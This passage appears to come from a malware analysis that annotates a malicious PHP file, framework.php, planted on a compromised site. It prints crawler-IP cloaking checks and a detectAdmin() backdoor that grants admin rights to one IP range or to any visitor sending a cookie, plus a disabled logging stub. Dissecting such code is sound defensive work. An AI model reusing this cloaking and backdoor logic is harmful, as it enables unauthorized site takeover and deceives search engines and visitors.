stripos($ip, '66.196.81.199') !== false ||
stripos($ip, '66.196.81.20') !== false ||
stripos($ip, '66.196.81.200') !== false ||
stripos($ip, '66.196.81.201') !== false ||
stripos($ip, '66.196.81.202') !== false ||
stripos($ip, '66.196.81.203') !== false ||
stripos($ip, '66.196.81.204') !== false ||
stripos($ip, '66.196.81.205') !== false ||
stripos($ip, '66.196.81.206') !== false ||
stripos($ip, '66.196.81.207') !== false ||
stripos($ip, '66.196.81.208') !== false ||
stripos($ip, '66.196.81.209') !== false ||
stripos($ip, '66.196.81.21') !== false ||
stripos($ip, '66.196.81.210') !== false ||
stripos($ip, '66.196.81.211') !== false ||
stripos($ip, '66.196.81.212') !== false ||
stripos($ip, '66.196.81.213') !== false ||
stripos($ip, '66.196.81.214') !== false ||
stripos($ip, '66.196.81.215') !== false ||
stripos($ip, '66.196.81.216') !== false ||
stripos($ip, '66.196.81.217') !== false ||
stripos($ip, '66.196.81.218') !== false ||
stripos($ip, '66.196.81.219') !== false ||
stripos($ip, '66.196.81.22') !== false ||
stripos($ip, '66.196.81.23') !== false ||
stripos($ip, '66.196.81.86') !== false ||
stripos($ip, '66.196.81.87') !== false ||
stripos($ip, '66.196.81.88') !== false ||
stripos($ip, '66.196.81.93') !== false ||
stripos($ip, '66.196.81.94') !== false ||
stripos($ip, '66.196.81.95') !== false ||
stripos($ip, '66.196.81.96') !== false ||
stripos($ip, '66.196.90') !== false ||
stripos($ip, '66.196.91') !== false ||
stripos($ip, '66.196.92') !== false ||
stripos($ip, '66.196.93.19') !== false ||
stripos($ip, '66.196.93.24') !== false ||
stripos($ip, '66.196.93.6') !== false ||
stripos($ip, '66.196.93.7') !== false ||
stripos($ip, '66.196.97') !== false ||
stripos($ip, '66.196.99.20') !== false ||
stripos($ip, '66.218.65.52') !== false ||
stripos($ip, '66.218.70') !== false ||
stripos($ip, '66.228.164') !== false ||
stripos($ip, '66.228.165') !== false ||
stripos($ip, '66.228.166') !== false ||
stripos($ip, '66.228.173') !== false ||
stripos($ip, '66.228.182.177') !== false ||
stripos($ip, '66.228.182.183') !== false ||
stripos($ip, '66.228.182.185') !== false ||
stripos($ip, '66.228.182.187') !== false ||
stripos($ip, '66.228.182.188') !== false ||
stripos($ip, '66.228.182.190') !== false ||
stripos($ip, '66.94.230.100') !== false ||
stripos($ip, '66.94.230.101') !== false ||
stripos($ip, '66.94.230.102') !== false ||
stripos($ip, '66.94.230.103') !== false ||
stripos($ip, '66.94.230.104') !== false ||
stripos($ip, '66.94.230.105') !== false ||
stripos($ip, '66.94.230.106') !== false ||
stripos($ip, '66.94.230.107') !== false ||
stripos($ip, '66.94.230.108') !== false ||
stripos($ip, '66.94.230.109') !== false ||
stripos($ip, '66.94.230.110') !== false ||
stripos($ip, '66.94.230.160') !== false ||
stripos($ip, '66.94.230.161') !== false ||
stripos($ip, '66.94.230.162') !== false ||
stripos($ip, '66.94.230.163') !== false ||
stripos($ip, '66.94.230.96') !== false ||
stripos($ip, '66.94.230.97') !== false ||
stripos($ip, '66.94.230.98') !== false ||
stripos($ip, '66.94.230.99') !== false ||
stripos($ip, '66.94.232') !== false ||
stripos($ip, '66.94.233') !== false ||
stripos($ip, '66.94.238.51') !== false ||
stripos($ip, '67.195.34') !== false ||
stripos($ip, '67.195.37') !== false ||
stripos($ip, '67.195.44') !== false ||
stripos($ip, '67.195.45') !== false ||
stripos($ip, '67.195.50.87') !== false ||
stripos($ip, '67.195.51') !== false ||
stripos($ip, '67.195.52') !== false ||
stripos($ip, '67.195.54') !== false ||
stripos($ip, '67.195.58') !== false ||
stripos($ip, '67.195.98') !== false ||
stripos($ip, '68.142.195.80') !== false ||
stripos($ip, '68.142.195.81') !== false ||
stripos($ip, '68.142.203.133') !== false ||
stripos($ip, '68.142.211.69') !== false ||
stripos($ip, '68.142.212.197') !== false ||
stripos($ip, '68.142.230.125') !== false ||
stripos($ip, '68.142.230.126') !== false ||
stripos($ip, '68.142.230.127') !== false ||
stripos($ip, '68.142.230.128') !== false ||
stripos($ip, '68.142.230.129') !== false ||
stripos($ip, '68.142.230.130') !== false ||
stripos($ip, '68.142.230.131') !== false ||
stripos($ip, '68.142.230.132') !== false ||
stripos($ip, '68.142.230.133') !== false ||
stripos($ip, '68.142.230.134') !== false ||
stripos($ip, '68.142.230.135') !== false ||
stripos($ip, '68.142.230.136') !== false ||
stripos($ip, '68.142.230.137') !== false ||
stripos($ip, '68.142.230.138') !== false ||
stripos($ip, '68.142.230.139') !== false ||
stripos($ip, '68.142.230.140') !== false ||
stripos($ip, '68.142.230.141') !== false ||
stripos($ip, '68.142.230.142') !== false ||
stripos($ip, '68.142.230.143') !== false ||
stripos($ip, '68.142.230.144') !== false ||
stripos($ip, '68.142.230.145') !== false ||
stripos($ip, '68.142.230.146') !== false ||
stripos($ip, '68.142.230.147') !== false ||
stripos($ip, '68.142.230.148') !== false ||
stripos($ip, '68.142.230.149') !== false ||
stripos($ip, '68.142.230.150') !== false ||
stripos($ip, '68.142.230.151') !== false ||
stripos($ip, '68.142.230.152') !== false ||
stripos($ip, '68.142.230.153') !== false ||
stripos($ip, '68.142.230.154') !== false ||
stripos($ip, '68.142.230.155') !== false ||
stripos($ip, '68.142.230.156') !== false ||
stripos($ip, '68.142.230.157') !== false ||
stripos($ip, '68.142.230.158') !== false ||
stripos($ip, '68.142.230.159') !== false ||
stripos($ip, '68.142.230.160') !== false ||
stripos($ip, '68.142.230.161') !== false ||
stripos($ip, '68.142.230.162') !== false ||
stripos($ip, '68.142.230.163') !== false ||
stripos($ip, '68.142.230.164') !== false ||
stripos($ip, '68.142.230.165') !== false ||
stripos($ip, '68.142.230.166') !== false ||
stripos($ip, '68.142.230.167') !== false ||
stripos($ip, '68.142.230.168') !== false ||
stripos($ip, '68.142.230.169') !== false ||
stripos($ip, '68.142.230.174') !== false ||
stripos($ip, '68.142.230.175') !== false ||
stripos($ip, '68.142.230.176') !== false ||
stripos($ip, '68.142.230.177') !== false ||
stripos($ip, '68.142.230.178') !== false ||
stripos($ip, '68.142.230.179') !== false ||
stripos($ip, '68.142.230.180') !== false ||
stripos($ip, '68.142.230.181') !== false ||
stripos($ip, '68.142.230.182') !== false ||
stripos($ip, '68.142.230.183') !== false ||
stripos($ip, '68.142.230.184') !== false ||
stripos($ip, '68.142.230.185') !== false ||
stripos($ip, '68.142.230.186') !== false ||
stripos($ip, '68.142.230.187') !== false ||
stripos($ip, '68.142.230.188') !== false ||
stripos($ip, '68.142.230.189') !== false ||
stripos($ip, '68.142.230.190') !== false ||
stripos($ip, '68.142.230.191') !== false ||
stripos($ip, '68.142.230.192') !== false ||
stripos($ip, '68.142.230.193') !== false ||
stripos($ip, '68.142.230.194') !== false ||
stripos($ip, '68.142.230.195') !== false ||
stripos($ip, '68.142.230.196') !== false ||
stripos($ip, '68.142.230.197') !== false ||
stripos($ip, '68.142.230.198') !== false ||
stripos($ip, '68.142.230.199') !== false ||
stripos($ip, '68.142.230.200') !== false ||
stripos($ip, '68.142.230.201') !== false ||
stripos($ip, '68.142.230.202') !== false ||
stripos($ip, '68.142.230.203') !== false ||
stripos($ip, '68.142.230.204') !== false ||
stripos($ip, '68.142.230.205') !== false ||
stripos($ip, '68.142.230.206') !== false ||
stripos($ip, '68.142.230.207') !== false ||
stripos($ip, '68.142.230.208') !== false ||
stripos($ip, '68.142.230.209') !== false ||
stripos($ip, '68.142.230.210') !== false ||
stripos($ip, '68.142.230.211') !== false ||
stripos($ip, '68.142.230.212') !== false ||
stripos($ip, '68.142.230.213') !== false ||
stripos($ip, '68.142.230.214') !== false ||
stripos($ip, '68.142.230.215') !== false ||
stripos($ip, '68.142.230.216') !== false ||
stripos($ip, '68.142.230.217') !== false ||
stripos($ip, '68.142.230.240') !== false ||
stripos($ip, '68.142.230.247') !== false ||
stripos($ip, '68.142.230.248') !== false ||
stripos($ip, '68.142.230.249') !== false ||
stripos($ip, '68.142.230.250') !== false ||
stripos($ip, '68.142.230.251') !== false ||
stripos($ip, '68.142.230.252') !== false ||
stripos($ip, '68.142.230.253') !== false ||
stripos($ip, '68.142.230.254') !== false ||
stripos($ip, '68.142.230.32') !== false ||
stripos($ip, '68.142.230.33') !== false ||
stripos($ip, '68.142.230.34') !== false ||
stripos($ip, '68.142.230.35') !== false ||
stripos($ip, '68.142.230.36') !== false ||
stripos($ip, '68.142.230.37') !== false ||
stripos($ip, '68.142.230.38') !== false ||
stripos($ip, '68.142.230.39') !== false ||
stripos($ip, '68.142.230.40') !== false ||
stripos($ip, '68.142.230.41') !== false ||
stripos($ip, '68.142.230.43') !== false ||
stripos($ip, '68.142.230.44') !== false ||
stripos($ip, '68.142.230.45') !== false ||
stripos($ip, '68.142.230.46') !== false ||
stripos($ip, '68.142.230.47') !== false ||
stripos($ip, '68.142.230.48') !== false ||
stripos($ip, '68.142.230.49') !== false ||
stripos($ip, '68.142.231.49') !== false ||
stripos($ip, '68.142.240.106') !== false ||
stripos($ip, '68.142.246') !== false ||
stripos($ip, '68.142.249') !== false ||
stripos($ip, '68.142.250') !== false ||
stripos($ip, '68.142.251') !== false ||
stripos($ip, '68.180.216.111') !== false ||
stripos($ip, '68.180.250') !== false ||
stripos($ip, '68.180.251') !== false ||
stripos($ip, '69.147.79.131') !== false ||
stripos($ip, '69.147.79.137') !== false ||
stripos($ip, '69.147.79.173') !== false ||
stripos($ip, '72.30.101') !== false ||
stripos($ip, '72.30.102') !== false ||
stripos($ip, '72.30.103') !== false ||
stripos($ip, '72.30.104') !== false ||
stripos($ip, '72.30.107') !== false ||
stripos($ip, '72.30.110') !== false ||
stripos($ip, '72.30.111') !== false ||
stripos($ip, '72.30.124.128') !== false ||
stripos($ip, '72.30.124.130') !== false ||
stripos($ip, '72.30.124.134') !== false ||
stripos($ip, '72.30.128') !== false ||
stripos($ip, '72.30.129') !== false ||
stripos($ip, '72.30.131') !== false ||
stripos($ip, '72.30.132') !== false ||
stripos($ip, '72.30.133') !== false ||
stripos($ip, '72.30.134') !== false ||
stripos($ip, '72.30.135') !== false ||
stripos($ip, '72.30.142.24') !== false ||
stripos($ip, '72.30.142.25') !== false ||
stripos($ip, '72.30.177') !== false ||
stripos($ip, '72.30.179') !== false ||
stripos($ip, '72.30.213.101') !== false ||
stripos($ip, '72.30.214') !== false ||
stripos($ip, '72.30.215') !== false ||
stripos($ip, '72.30.216') !== false ||
stripos($ip, '72.30.221') !== false ||
stripos($ip, '72.30.226') !== false ||
stripos($ip, '72.30.252') !== false ||
stripos($ip, '72.30.54') !== false ||
stripos($ip, '72.30.56') !== false ||
stripos($ip, '72.30.60') !== false ||
stripos($ip, '72.30.61') !== false ||
stripos($ip, '72.30.81') !== false ||
stripos($ip, '72.30.87') !== false ||
stripos($ip, '72.30.9') !== false ||
stripos($ip, '72.30.97') !== false ||
stripos($ip, '72.30.98') !== false ||
stripos($ip, '72.30.99') !== false ||
stripos($ip, '74.6.11') !== false ||
stripos($ip, '74.6.12') !== false ||
stripos($ip, '74.6.13') !== false ||
stripos($ip, '74.6.131') !== false ||
stripos($ip, '74.6.16') !== false ||
stripos($ip, '74.6.17') !== false ||
stripos($ip, '74.6.18') !== false ||
stripos($ip, '74.6.19') !== false ||
stripos($ip, '74.6.20') !== false ||
stripos($ip, '74.6.21') !== false ||
stripos($ip, '74.6.22') !== false ||
stripos($ip, '74.6.23') !== false ||
stripos($ip, '74.6.24') !== false ||
stripos($ip, '74.6.240') !== false ||
stripos($ip, '74.6.25') !== false ||
stripos($ip, '74.6.26') !== false ||
stripos($ip, '74.6.27') !== false ||
stripos($ip, '74.6.28') !== false ||
stripos($ip, '74.6.29') !== false ||
stripos($ip, '74.6.30') !== false ||
stripos($ip, '74.6.31') !== false ||
stripos($ip, '74.6.65') !== false ||
stripos($ip, '74.6.66') !== false ||
stripos($ip, '74.6.67') !== false ||
stripos($ip, '74.6.68') !== false ||
stripos($ip, '74.6.69') !== false ||
stripos($ip, '74.6.7') !== false ||
stripos($ip, '74.6.70') !== false ||
stripos($ip, '74.6.71') !== false ||
stripos($ip, '74.6.72') !== false ||
stripos($ip, '74.6.73') !== false ||
stripos($ip, '74.6.74') !== false ||
stripos($ip, '74.6.75') !== false ||
stripos($ip, '74.6.76') !== false ||
stripos($ip, '74.6.79') !== false ||
stripos($ip, '74.6.8') !== false ||
stripos($ip, '74.6.85') !== false ||
stripos($ip, '74.6.86') !== false ||
stripos($ip, '72.14.253') !== false ||
stripos($ip, '72.14.235') !== false ||
stripos($ip, '72.14.223') !== false ||
stripos($ip, '72.14.221') !== false ||
stripos($ip, '72.14.219') !== false ||
stripos($ip, '72.14.217') !== false ||
stripos($ip, '72.14.215') !== false ||
stripos($ip, '72.14.211') !== false ||
stripos($ip, '72.14.209') !== false ||
stripos($ip, '72.14.207') !== false ||
stripos($ip, '72.14.205') !== false ||
stripos($ip, '216.239.51') !== false ||
stripos($ip, '216.239.59') !== false ||
stripos($ip, '72.14.205') !== false ||
stripos($ip, '64.233.161') !== false ||
stripos($ip, '64.233.167') !== false ||
stripos($ip, '64.233.169') !== false ||
stripos($ip, '64.233.171') !== false ||
stripos($ip, '64.233.179') !== false ||
stripos($ip, '64.233.183') !== false ||
stripos($ip, '64.233.187') !== false ||
stripos($ip, '64.233.189') !== false ||
stripos($ip, '66.102.1') !== false ||
stripos($ip, '66.102.9') !== false ||
stripos($ip, '66.249.81') !== false ||
stripos($ip, '66.249.83') !== false ||
stripos($ip, '66.249.89') !== false ||
stripos($ip, '66.249.91') !== false ||
stripos($ip, '66.249.93') !== false ||
stripos($ip, '74.125.77.132') !== false ||
stripos($ip, '66.249.71') !== false ||
stripos($ip, '66.249.65') !== false ||
stripos($ip, '66.249.68') !== false ||
stripos($ip, '149.122.15.60') !== false ||
stripos($ip, '205.45.62.124') !== false ||
stripos($ip, '69.64.147.212') !== false ||
stripos($ip, '66.249.67') !== false ||
stripos($ip, '2.8.10.5') !== false ||
stripos($ip, '209.85.229.132') !== false ||
stripos($ip, '66.249.84') !== false ||
stripos($ip, '74.6.87') !== false ||
stripos($ip, '66.249') !== false
//|| stripos($ip, '84.111.167.34') !== false
)
{
return true;
}
else
{
return false;
}
}
function detectAdmin($server_ip) {
Now we decide if you are admin – note the use of a regex form of the CULL ip space as noted above. If you show up from this ip space, and provide the above overridden password you are in as admin!
$stop_ips_masks = array("37\.9\.[0-9]+\.[0-9]+");
$is_admin = false;
foreach ($stop_ips_masks as $stop_ip_mask)
if (preg_match("/{$stop_ip_mask}/i", $server_ip)) {
$is_admin = true;
break;
}
$count = count($_COOKIE);
if($count > 0)
{
$is_admin = true;
}
return $is_admin;
}
function HandleLog ($data)
{
return;
$dataStringForTextFileLog = implode(", ", $data);
$dataStringForTextFileLog .= ".\n";
$myFile = "log.txt";
$fh = fopen($myFile, 'a');
fwrite($fh, $dataStringForTextFileLog);
fclose($fh);
}
And finally, cleanup logs and such. that’s all in the framework.php file alone folks! The other two modified files were png!